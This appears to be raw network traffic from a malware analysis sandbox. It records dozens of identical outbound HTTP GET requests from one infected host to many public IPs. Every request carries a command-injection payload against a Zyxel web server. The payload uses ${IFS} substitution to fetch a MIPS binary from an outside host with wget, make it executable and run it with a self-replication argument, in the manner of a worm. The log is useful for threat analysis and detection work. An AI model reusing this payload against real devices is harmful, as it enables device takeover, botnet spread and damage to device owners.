                                          Jan 14, 2024 15:46:17.008358002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4390192.168.2.2354286142.80.167.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008378029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4391192.168.2.2335846192.108.160.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008419991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4392192.168.2.234776693.161.132.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008440971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4393192.168.2.2339988183.136.73.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008466959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4394192.168.2.235478636.182.225.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008486986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4395192.168.2.235652634.123.138.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008512020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4396192.168.2.234564673.113.117.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008543015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4397192.168.2.2336280220.165.177.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008580923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4398192.168.2.2345430144.131.40.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008605957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4399192.168.2.234353078.134.140.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008611917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4400192.168.2.2354724165.23.2.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008641958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4401192.168.2.2342270137.128.178.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008673906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4402192.168.2.2354160115.176.90.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008713961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4403192.168.2.2353778193.164.96.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008728981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4404192.168.2.234451448.250.87.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008759975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4405192.168.2.235465260.15.121.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008780003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4406192.168.2.2337788163.255.225.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008785009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4407192.168.2.233731850.181.65.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008832932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4408192.168.2.233497424.225.21.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008879900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4409192.168.2.233896647.88.251.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008919001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4410192.168.2.2350606111.103.184.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008928061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4411192.168.2.2340124207.91.116.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008940935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4412192.168.2.2360286158.88.238.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.008970022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4413192.168.2.2338204146.81.103.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009002924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4414192.168.2.233660441.160.226.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009035110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4415192.168.2.2355772156.226.14.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009066105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4416192.168.2.2356188107.126.235.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009146929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4417192.168.2.2350534162.132.231.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009169102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4418192.168.2.234507495.100.84.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009198904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4419192.168.2.234100644.107.190.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009202957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4420192.168.2.2344806157.31.179.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009232998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4421192.168.2.2338252107.47.169.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009269953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4422192.168.2.2334554110.117.47.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009287119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4423192.168.2.233700646.238.237.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009320974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4424192.168.2.2360290211.178.41.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009345055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4425192.168.2.234161827.15.140.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009372950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4426192.168.2.235973637.55.116.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009402037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4427192.168.2.2356634167.110.181.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009408951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4428192.168.2.2333794114.112.221.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009429932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4429192.168.2.235181413.183.14.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009462118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4430192.168.2.2357934181.36.30.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009496927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4431192.168.2.235480875.68.13.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009496927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4432192.168.2.2352000193.43.245.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009510994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4433192.168.2.2344994149.8.236.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009541035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4434192.168.2.2343926145.233.117.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009566069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4435192.168.2.235847676.206.183.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009593010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4436192.168.2.235358458.22.221.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009632111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4437192.168.2.2348500128.181.0.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009674072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4438192.168.2.2355108119.147.187.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009695053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4439192.168.2.2353294207.238.205.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009706020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4440192.168.2.234380869.164.142.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009766102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4441192.168.2.234749861.222.39.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009783983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4442192.168.2.234776039.216.252.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009800911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4443192.168.2.2359674195.154.156.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009815931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4444192.168.2.234165234.254.145.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009867907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4445192.168.2.2340912170.227.169.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009882927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4446192.168.2.236058837.69.150.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009903908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4447192.168.2.235303832.174.60.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.009973049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4448192.168.2.233841082.104.218.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010001898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4449192.168.2.234199468.64.159.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010027885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4450192.168.2.2352916195.128.84.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010030031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4451192.168.2.2360978144.105.182.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010057926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4452192.168.2.2333904218.25.119.47443
                                          TimestampBytes transferredDirectionData
